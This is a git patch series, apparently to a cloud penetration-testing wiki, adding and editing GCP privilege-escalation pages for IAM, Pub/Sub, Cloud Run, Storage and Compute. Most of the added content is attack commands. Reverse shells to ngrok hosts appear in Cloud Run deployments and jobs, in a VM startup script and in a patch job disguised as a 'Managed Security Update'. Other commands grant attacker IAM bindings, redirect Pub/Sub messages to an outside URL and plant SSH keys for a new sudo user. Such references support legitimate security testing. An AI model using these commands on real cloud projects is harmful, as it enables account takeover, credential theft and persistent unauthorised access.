[**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccountKeys.create.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). Note that **`iam.serviceAccountKeys.update` won't work to modify the key** of a SA because to do that the permissions `iam.serviceAccountKeys.create` is also needed. @@ -65,8 +68,6 @@ If you have the **`iam.serviceAccounts.implicitDelegation`** permission on a Ser Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation of `gcloud` only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method. So here you have how to get a token using the API directly: -<details><summary>Generate access token with delegation using API</summary> - ```bash curl -X POST \ 'https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/'"${TARGET_SERVICE_ACCOUNT}"':generateAccessToken' \ @@ -78,8 +79,6 @@ curl -X POST \ }' ``` -</details> - You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/5-iam.serviceAccounts.implicitDelegation.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.implicitDelegation.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). ### `iam.serviceAccounts.signBlob` @@ -98,12 +97,10 @@ You can find a script to automate the [**creation, exploit and cleaning of a vul An attacker with the mentioned permissions will be able to **add IAM policies to service accounts**. You can abuse it to **grant yourself** the permissions you need to impersonate the service account. In the following example we are granting ourselves the `roles/iam.serviceAccountTokenCreator` role over the interesting SA: -<details><summary>Add IAM policy binding to service account</summary> - ```bash gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \ - --member="user:username@domain.com" \ - --role="roles/iam.serviceAccountTokenCreator" + --member="user:username@domain.com" \ + --role="roles/iam.serviceAccountTokenCreator" # If you still have prblem grant yourself also this permission gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \ \ @@ -111,8 +108,6 @@ gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.i --role="roles/iam.serviceAccountUser" ``` -</details> - You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.** ### `iam.serviceAccounts.actAs` @@ -135,8 +130,6 @@ According to this [**interesting post**](https://medium.com/google-cloud/authent You can generate an OpenIDToken (if you have the access) with: -<details><summary>Generate OpenID token for service account</summary> - ```bash # First activate the SA with iam.serviceAccounts.getOpenIdToken over the other SA gcloud auth activate-service-account --key-file=/path/to/svc_account.json @@ -144,18 +137,12 @@ gcloud auth activate-service-account --key-file=/path/to/svc_account.json gcloud auth print-identity-token "${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com" --audiences=https://example.com ``` -</details> - Then you can just use it to access the service with: -<details><summary>Use OpenID token to authenticate</summary> - ```bash curl -v -H "Authorization: Bearer id_token" https://some-cloud-run-uc.a.run.app ``` -</details> - Some services that support authentication via this kind of tokens are: - [Google Cloud Run](https://cloud.google.com/run/) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md index f993e1dfc9..447e6b768a 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md @@ -10,9 +10,13 @@ Get more information in: ../gcp-services/gcp-pub-sub.md {{#endref}} -### `pubsub.snapshots.create` +### `pubsub.snapshots.create` (`pubsub.topics.attachSubscription`) -The snapshots of topics **contain the current unACKed messages and every message after it**. You could create a snapshot of a topic to **access all the messages**, **avoiding access the topic directly**. +The snapshots of topics **contain the current unACKed messages and every message after it**. You could create a snapshot of a topic to **access all the messages**, **avoiding access the topic directly**. + +```bash +gcloud pubsub subscriptions create <subscription_name> --topic <topic_name> --push-endpoint https://<URL_to_push_to> +``` ### **`pubsub.snapshots.setIamPolicy`** @@ -30,10 +34,45 @@ Set your own URL as push endpoint to steal the messages. Access messages using the subscription. +```bash +gcloud pubsub subscriptions pull <SUSCRIPTION> \ + --limit=50 \ + --format="json" \ + --project=<PROJECTID> +``` + ### `pubsub.subscriptions.setIamPolicy` Give yourself any of the preiovus permissions +```bash +# Add Binding +gcloud pubsub subscriptions add-iam-policy-binding <SUSCRIPTION_NAME> \ + --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \ + --role="<ROLE_OR_CUSTOM_ROLE>" \ + --project="<PROJECT_ID>" + +# Remove Binding +gcloud pubsub subscriptions remove-iam-policy-binding <SUSCRIPTION_NAME> \ + --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \ + --role="<ROLE_OR_CUSTOM_ROLE>" \ + --project="<PROJECT_ID>" + +# Change Policy +gcloud pubsub subscriptions set-iam-policy <SUSCRIPTION_NAME> \ + <(echo '{ + "bindings": [ + { + "role": "<ROLE_OR_CUSTOM_ROLE>", + "members": [ + "serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" + ] + } + ] + }') \ + --project=<PROJECT_ID> +``` + {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md index 5313d0e003..3b02f66231 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md @@ -22,9 +22,6 @@ Note that when using `gcloud run deploy` instead of just creating the service ** Like the previous one but updating a service: -<details> -<summary>Deploy Cloud Run service with reverse shell</summary> - ```bash # Launch some web server to listen in port 80 so the service works echo "python3 -m http.server 80;sh -i >& /dev/tcp/0.tcp.eu.ngrok.io/14348 0>&1" | base64 @@ -41,19 +38,32 @@ gcloud run deploy hacked \ # If you don't have permissions to use "--allow-unauthenticated", dont use it ``` -</details> - ### `run.services.setIamPolicy` Give yourself previous permissions over cloud Run. +```bash +# Change policy +gcloud run services set-iam-policy <SERVICE_NAME> <POLICY_FILE>.json \ + --region=us-central1 + +# Add binding +gcloud run services add-iam-policy-binding <SERVICE_NAME> \ + --member="allUsers" \ + --role="roles/run.invoker" \ + --region=us-central1 + +# Remove binding +gcloud run services remove-iam-policy-binding <SERVICE_NAME> \ + --member="allUsers" \ + --role="roles/run.invoker" \ + --region=us-central1 +``` + ### `run.jobs.create`, `run.jobs.run`, `iam.serviceaccounts.actAs`,(`run.jobs.get`) Launch a job with a reverse shell to steal the service account indicated in the command. You can find an [**exploit here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/m-run.jobs.create.sh). -<details> -<summary>Create Cloud Run job with reverse shell</summary> - ```bash gcloud beta run jobs create jab-cloudrun-3326 \ --image=ubuntu:latest \ @@ -64,15 +74,10 @@ gcloud beta run jobs create jab-cloudrun-3326 \ ``` -</details> - ### `run.jobs.update`,`run.jobs.run`,`iam.serviceaccounts.actAs`,(`run.jobs.get`) Similar to the previous one it's possible to **update a job and update the SA**, the **command** and **execute it**: -<details> -<summary>Update Cloud Run job and execute with reverse shell</summary> - ```bash gcloud beta run jobs update hacked \ --image=mubuntu:latest \ @@ -83,25 +88,35 @@ gcloud beta run jobs update hacked \ --execute-now ``` -</details> - ### `run.jobs.setIamPolicy` Give yourself the previous permissions over Cloud Jobs. +```bash +# Change policy +gcloud run jobs set-iam-policy <JOB_NAME> <POLICY_FILE>.json \ + --region=us-central1 + +# Add binding +gcloud run jobs add-iam-policy-binding <JOB_NAME> \ + --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \ + --role="roles/run.invoker" \ + --region=us-central1 + +# Remove binding +gcloud run jobs remove-iam-policy-binding <JOB_NAME> \ + --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \ + --role="roles/run.invoker" \ + --region=us-central1 +``` ### `run.jobs.run`, `run.jobs.runWithOverrides`, (`run.jobs.get`) Abuse the env variables of a job execution to execute arbitrary code and get a reverse shell to dump the contents of the container (source code) and access the SA inside the metadata: -<details> -<summary>Execute Cloud Run job with environment variable exploitation</summary> - ```bash gcloud beta run jobs execute job-name --region <region> --update-env-vars="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s" ``` -</details> - ## References - [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md index 03905af538..9a19163faf 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md @@ -41,6 +41,13 @@ gcloud secrets add-iam-policy-binding <scret-name> \ --role="roles/secretmanager.secretAccessor" ``` +Or revoke policies with: +```bash +gcloud secrets remove-iam-policy-binding <secret-name> \ +--member="serviceAccount:<sa-name>@<PROJECT_ID>.iam.gserviceaccount.com" \ + --role="roles/secretmanager.secretAccessor" +``` + </details> {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md index fd5a53e066..b0872a07f6 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md @@ -21,10 +21,70 @@ This permission allows you to **download files stored inside Cloud Storage**. Th You can give you permission to **abuse any of the previous scenarios of this section**. +```bash +# Add binding +gcloud storage objects add-iam-policy-binding gs://<BUCKET_NAME>/<OBJECT_NAME> \ + --member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \ + --role="<ROLE>" \ + --project=<PROJECT_ID> + +# Remove binding +gcloud storage objects remove-iam-policy-binding gs://<BUCKET_NAME>/<OBJECT_NAME> \ + --member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \ + --role="<ROLE>" \ + --project=<PROJECT_ID> + +# Change Policy +gcloud storage objects set-iam-policy gs://<BUCKET_NAME>/<OBJECT_NAME> - \ + --project=<PROJECT_ID> <<'POLICY' +{ + "bindings": [ + { + "role": "<ROLE>", + "members": [ + "<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" + ] + } + ] +} +POLICY + +``` + ### **`storage.buckets.setIamPolicy`** For an example on how to modify permissions with this permission check this page: +```bash +# Add binding +gcloud storage buckets add-iam-policy-binding gs://<MY_BUCKET> \ + --member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \ + --role=<ROLE> \ + --project=<MY_PROJECT> + +# Remove binding +gcloud storage buckets remove-iam-policy-binding gs://<MY_BUCKET> \ + --member="<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" \ + --role=<ROLE> \ + --project=<MY_PROJECT> + +# Change policy +gcloud storage buckets set-iam-policy gs://<BUCKET_NAME> - \ + --project=<PROJECT_ID> <<'POLICY' +{ + "bindings": [ + { + "role": "<ROLE>", + "members": [ + "<MEMBER_TYPE>:<MEMBER_IDENTIFIER>" + ] + } + ] +} +POLICY + +``` + {{#ref}} ../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md {{#endref}} @@ -33,8 +93,6 @@ For an example on how to modify permissions with this permission check this page Cloud Storage's "interoperability" feature, designed for **cross-cloud interactions** like with AWS S3, involves the **creation of HMAC keys for Service Accounts and users**. An attacker can exploit this by **generating an HMAC key for a Service Account with elevated privileges**, thus **escalating privileges within Cloud Storage**. While user-associated HMAC keys are only retrievable via the web console, both the access and secret keys remain **perpetually accessible**, allowing for potential backup access storage. Conversely, Service Account-linked HMAC keys are API-accessible, but their access and secret keys are not retrievable post-creation, adding a layer of complexity for continuous access. -<details><summary>Create and use HMAC key for privilege escalation</summary> - ```bash # Create key gsutil hmac create <sa-email> # You might need to execute this inside a VM instance @@ -65,8 +123,6 @@ gsutil ls gs://[BUCKET_NAME] gcloud config set pass_credentials_to_gsutil true ``` -</details> - Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py). ### `storage.objects.create`, `storage.objects.delete` = Storage Write permissions From 862cfc77325ada400e13c513be57e7a1ad884786 Mon Sep 17 00:00:00 2001 From: SirBroccoli <carlospolop@gmail.com> Date: Wed, 26 Nov 2025 17:12:13 +0100 Subject: [PATCH 2/3] Update gcp-cloud-run-post-exploitation.md --- .../gcp-post-exploitation/gcp-cloud-run-post-exploitation.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md index cd5588176f..2597044920 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md @@ -11,7 +11,7 @@ For more information about Cloud Run check: {{#endref}} ### Delete CloudRun Job -The `run.services.delete` and `run.services.get permissions`, as well as run.jobs.delete, allow an identity to completely delete a Cloud Run service or job, including its configuration and history. In the hands of an attacker, this can cause immediate disruption to applications or critical workflows, resulting in a denial of service (DoS) for users and systems that depend on the service logic or essential scheduled tasks. +The `run.services.delete` and `run.services.get` permissions, as well as `run.jobs.delete`, allow an identity to completely delete a Cloud Run service or job, including its configuration and history. In the hands of an attacker, this can cause immediate disruption to applications or critical workflows, resulting in a denial of service (DoS) for users and systems that depend on the service logic or essential scheduled tasks. To delete a job, the following operation can be performed. ```bash From b6af849e117658cdd8a7d430ac9679786aa1b00f Mon Sep 17 00:00:00 2001 From: JaimePolop <jaimepolop@gmail.com> Date: Wed, 26 Nov 2025 17:22:08 +0100 Subject: [PATCH 3/3] fix --- .../gcp-compute-privesc/README.md | 151 ++++++++++++++++++ .../gcp-add-custom-ssh-metadata.md | 100 ++++++++++++ .../gcp-firebase-privesc.md | 3 - 3 files changed, 251 insertions(+), 3 deletions(-) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md new file mode 100644 index 0000000000..104bae5a6e --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md @@ -0,0 +1,151 @@ +# GCP - Compute Privesc + +{{#include ../../../../banners/hacktricks-training.md}} + +## Compute + +For more information about Compute and VPC (netowork) in GCP check: + +{{#ref}} +../../gcp-services/gcp-compute-instances-enum/ +{{#endref}} + +> [!CAUTION] +> Note that to perform all the privilege escalation atacks that require to modify the metadata of the instance (like adding new users and SSH keys) it's **needed that you have `actAs` permissions over the SA attached to the instance**, even if the SA is already attached! + +### `compute.projects.setCommonInstanceMetadata` + +With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with.\ +Limitations: + +- Note that GCP Service Accounts running in VM instances by default have a **very limited scope** +- You will need to be **able to contact the SSH** server to login + +For more information about how to exploit this permission check: + +{{#ref}} +gcp-add-custom-ssh-metadata.md +{{#endref}} + +You could aslo perform this attack by adding new startup-script and rebooting the instance: + +```bash +gcloud compute instances add-metadata my-vm-instance \ + --metadata startup-script='#!/bin/bash +bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18347 0>&1 &' + +gcloud compute instances reset my-vm-instance +``` + +### `compute.instances.setMetadata` + +This permission gives the **same privileges as the previous permission** but over a specific instances instead to a whole project. The **same exploits and limitations as for the previous section applies**. + +### `compute.instances.setIamPolicy` + +This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them. Here is an example adding `roles/compute.admin` to a Service Account: + +```bash +export SERVER_SERVICE_ACCOUNT=YOUR_SA +export INSTANCE=YOUR_INSTANCE +export ZONE=YOUR_INSTANCE_ZONE + +cat <<EOF > policy.json +bindings: +- members: + - serviceAccount:$SERVER_SERVICE_ACCOUNT + role: roles/compute.admin +version: 1 +EOF + +gcloud compute instances set-iam-policy $INSTANCE policy.json --zone=$ZONE +``` + +### **`compute.instances.osLogin`** + +If **OSLogin is enabled in the instance**, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You **won't have root privs** inside the instance. + +> [!TIP] +> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM. + +### **`compute.instances.osAdminLogin`** + +If **OSLogin is enabled in the instanc**e, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to the instance. You will have **root privs** inside the instance. + +> [!TIP] +> In order to successfully login with this permission inside the VM instance, you need to have the `iam.serviceAccounts.actAs` permission over the SA atatched to the VM. + +### `compute.instances.create`,`iam.serviceAccounts.actAs, compute.disks.create`, `compute.instances.create`, `compute.instances.setMetadata`, `compute.instances.setServiceAccount`, `compute.subnetworks.use`, `compute.subnetworks.useExternalIp` + +It's possible to **create a virtual machine with an assigned Service Account and steal the token** of the service account accessing the metadata to escalate privileges to it. + +The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/compute.instances.create.py). + +### `osconfig.patchDeployments.create` | `osconfig.patchJobs.exec` + +If you have the **`osconfig.patchDeployments.create`** or **`osconfig.patchJobs.exec`** permissions you can create a [**patch job or deployment**](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project. + +Note that at the moment you **don't need `actAs` permission** over the SA attached to the instance. + +If you want to manually exploit this you will need to create either a [**patch job**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_job.json) **or** [**deployment**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_deployment.json)**.**\ +For a patch job run: + +```python +cat > /tmp/patch-job.sh <<EOF +#!/bin/bash +bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18442 0>&1 +EOF + +gsutil cp /tmp/patch-job.sh gs://readable-bucket-by-sa-in-instance/patch-job.sh + +# Get the generation number +gsutil ls -a gs://readable-bucket-by-sa-in-instance + +gcloud --project=$PROJECT_ID compute os-config patch-jobs execute \ + --instance-filter-names=zones/us-central1-a/instances/<instance-name> \ + --pre-patch-linux-executable=gs://readable-bucket-by-sa-in-instance/patch-job.sh#<generation-number> \ + --reboot-config=never \ + --display-name="Managed Security Update" \ + --duration=300s +``` + +To deploy a patch deployment: + +```bash +gcloud compute os-config patch-deployments create <name> ... +``` + +The tool [patchy](https://github.com/rek7/patchy) could been used in the past for exploiting this misconfiguration (but now it's not working). + +**An attacker could also abuse this for persistence.** + +### `compute.machineImages.setIamPolicy` + +**Grant yourself extra permissions** to compute Image. + +### `compute.snapshots.setIamPolicy` + +**Grant yourself extra permissions** to a disk snapshot. + +### `compute.disks.setIamPolicy` + +**Grant yourself extra permissions** to a disk. + +### Bypass Access Scopes + +Following this link you find some [**ideas to try to bypass access scopes**](../index.html). + +### Local Privilege Escalation in GCP Compute instance + +{{#ref}} +../gcp-local-privilege-escalation-ssh-pivoting.md +{{#endref}} + +## References + +- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) + +{{#include ../../../../banners/hacktricks-training.md}} + + + diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md new file mode 100644 index 0000000000..a68e756b51 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md @@ -0,0 +1,100 @@ +# GCP - Add Custom SSH Metadata + +{{#include ../../../../banners/hacktricks-training.md}} + +## Modifying the metadata <a href="#modifying-the-metadata" id="modifying-the-metadata"></a> + +Metadata modification on an instance could lead to **significant security risks if an attacker gains the necessary permissions**. + +### **Incorporation of SSH Keys into Custom Metadata** + +On GCP, **Linux systems** often execute scripts from the [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts). A critical component of this is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which is designed to **regularly check** the instance metadata endpoint for **updates to the authorized SSH public keys**. + +Therefore, if an attacker can modify custom metadata, he could make the the daemon find a new public key, which will processed and **integrated into the local system**. The key will be added into `~/.ssh/authorized_keys` file of an **existing user or potentially creating a new user with `sudo` privileges**, depending on the key's format. And the attacker will be able to compromise the host. + +### **Add SSH key to existing privileged user** + +1. **Examine Existing SSH Keys on the Instance:** + + - Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under `metadata`, specifically the `ssh-keys` key. + + ```bash + gcloud compute instances describe [INSTANCE] --zone [ZONE] + ``` + + - Pay attention to the format of the SSH keys: the username precedes the key, separated by a colon. + +2. **Prepare a Text File for SSH Key Metadata:** + - Save the details of usernames and their corresponding SSH keys into a text file named `meta.txt`. This is essential for preserving the existing keys while adding new ones. +3. **Generate a New SSH Key for the Target User (`alice` in this example):** + + - Use the `ssh-keygen` command to generate a new SSH key, ensuring that the comment field (`-C`) matches the target username. + + ```bash + ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub + ``` + + - Add the new public key to `meta.txt`, mimicking the format found in the instance's metadata. + +4. **Update the Instance's SSH Key Metadata:** + + - Apply the updated SSH key metadata to the instance using the `gcloud compute instances add-metadata` command. + + ```bash + gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt + ``` + +5. **Access the Instance Using the New SSH Key:** + + - Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (`alice` in this example). + + ```bash + ssh -i ./key alice@localhost + sudo id + ``` + +### **Create a new privileged user and add a SSH key** + +If no interesting user is found, it's possible to create a new one which will be given `sudo` privileges: + +```bash +# define the new account username +NEWUSER="definitelynotahacker" + +# create a key +ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P "" + +# create the input meta file +NEWKEY="$(cat ./key.pub)" +echo "$NEWUSER:$NEWKEY" > ./meta.txt + +# update the instance metadata +gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt + +# ssh to the new account +ssh -i ./key "$NEWUSER"@localhost +``` + +### SSH keys at project level <a href="#sshing-around" id="sshing-around"></a> + +It's possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by **applying SSH keys at the project level**. This approach allows SSH access to any instance within the project that hasn't explicitly blocked project-wide SSH keys. Here's a summarized guide: + +1. **Apply SSH Keys at the Project Level:** + + - Use the `gcloud compute project-info add-metadata` command to add SSH keys from `meta.txt` to the project's metadata. This action ensures that the SSH keys are recognized across all VMs in the project, unless a VM has the "Block project-wide SSH keys" option enabled. + + ```bash + gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt + ``` + +2. **SSH into Instances Using Project-Wide Keys:** + - With project-wide SSH keys in place, you can SSH into any instance within the project. Instances that do not block project-wide keys will accept the SSH key, granting access. + - A direct method to SSH into an instance is using the `gcloud compute ssh [INSTANCE]` command. This command uses your current username and the SSH keys set at the project level to attempt access. + +## References + +- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/) + +{{#include ../../../../banners/hacktricks-training.md}} + + diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md index 2f80a58da3..caa8d1192b 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md @@ -464,9 +464,6 @@ The attacker gains access to the Firebase CLI credentials file. They can then co ```bash firebase projects:list ``` -## References - -- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) {{#include ../../../banners/hacktricks-training.md}}